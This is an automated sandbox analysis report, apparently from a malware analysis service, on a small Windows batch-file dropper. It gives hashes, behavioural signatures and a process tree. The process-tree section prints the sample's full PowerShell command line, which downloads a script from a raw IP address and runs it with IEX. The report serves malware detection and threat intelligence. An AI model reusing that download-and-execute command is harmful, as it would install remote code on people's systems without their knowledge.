Analysis
- max time kernel: 112s
- max time network: 119s
- platform: windows7_x64
- resource: win7
- submitted: 03-08-2020 09:10
Static task: static1
Behavioral task: behavioral1
- Sample: 2b4587aed40db6e44cbff092b52b841e.bat
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: 2b4587aed40db6e44cbff092b52b841e.bat
- Resource: win10v200722 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 2b4587aed40db6e44cbff092b52b841e.bat
- Size: 218B
- MD5: c69dabb8c2f1ca155fb5fe3b0482d0a7
- SHA1: b3faaf0bd82fe27b076ec814b2123cf962ead51b
- SHA256: 99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
- SHA512: c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (cmd.exe), columns: description | pid | process | target process
    PID 1124 wrote to memory of 836 | 1124 | cmd.exe | powershell.exe
    PID 1124 wrote to memory of 836 | 1124 | cmd.exe | powershell.exe
    PID 1124 wrote to memory of 836 | 1124 | cmd.exe | powershell.exe
    PID 1124 wrote to memory of 836 | 1124 | cmd.exe | powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes (powershell.exe), columns: pid | process
    836 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (powershell.exe), columns: description | pid | process
    Token: SeDebugPrivilege | 836 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (powershell.exe), columns: pid | process
    836 | powershell.exe
    836 | powershell.exe
- Blacklisted process makes network request (1 IoC)
  Processes (powershell.exe), columns: flow | pid | process
    4 | 836 | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 1124)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 836)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request